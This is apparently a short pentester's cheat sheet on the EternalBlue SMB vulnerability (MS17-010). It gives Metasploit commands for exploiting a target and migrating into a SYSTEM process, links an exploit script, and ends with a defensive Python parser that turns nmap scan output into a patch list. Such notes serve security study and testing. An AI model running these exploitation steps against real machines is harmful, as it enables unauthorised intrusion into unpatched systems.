
Eternal Blue

Created: 28.07.2022

It’s basically a buffer overflow vulnerability in the SMB module.

References


https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

📕 RTFM

nmap --script vuln <ip>
msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue 
set RHOSTS <target IP>
exploit
# you will get a session if the system is vulnerable

ps # list processes, choose the one with System permissions if your permissions are not enough

migrate <pid> # try different PIDs 

Python exploit script - https://github.com/3ndG4me/AutoBlue-MS17-010/blob/master/eternalblue_exploit10.py.
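
For the patching side of the `nmap --script vuln` step above, here is an added example (not part of the original notes) that turns saved scan output into an MS17-010 patch queue. The sample output is constructed, the addresses are documentation ranges, and the function names `triage` and `needs_patch` are hypothetical.

```python
import re

# Constructed sample of nmap normal output; addresses are documentation ranges.
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH

Nmap scan report for fileserver.example (192.0.2.11)
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 192.0.2.12
PORT    STATE  SERVICE
445/tcp closed microsoft-ds
"""

HOST_RE = re.compile(r"^Nmap scan report for (.+?)\s*$")
SCRIPT_RE = re.compile(r"^\|[ _]([\w-]+):")  # "| name:" opens a script block
STATE_RE = re.compile(r"^\|[ _]\s+State:\s*(\S.*?)\s*$")

def triage(scan_text, script="smb-vuln-ms17-010"):
    """Map each scanned host to the State the script reported for it."""
    results, host, current = {}, None, None
    for line in scan_text.splitlines():
        if m := HOST_RE.match(line):
            host, current = m.group(1), None
            # No block for this script is not proof of a patch: the port may
            # be closed or filtered, or the script may not have run.
            results[host] = "NO RESULT"
        elif m := SCRIPT_RE.match(line):
            current = m.group(1)
        elif host and current == script and (m := STATE_RE.match(line)):
            results[host] = m.group(1)
    return results

def needs_patch(scan_text):
    """Hosts flagged VULNERABLE, i.e. the MS17-010 patch queue."""
    return sorted(h for h, s in triage(scan_text).items() if s.startswith("VULNERABLE"))
```

Hosts reported as `NO RESULT` still need their patch level confirmed by other means, since the scan output alone does not show they are fixed.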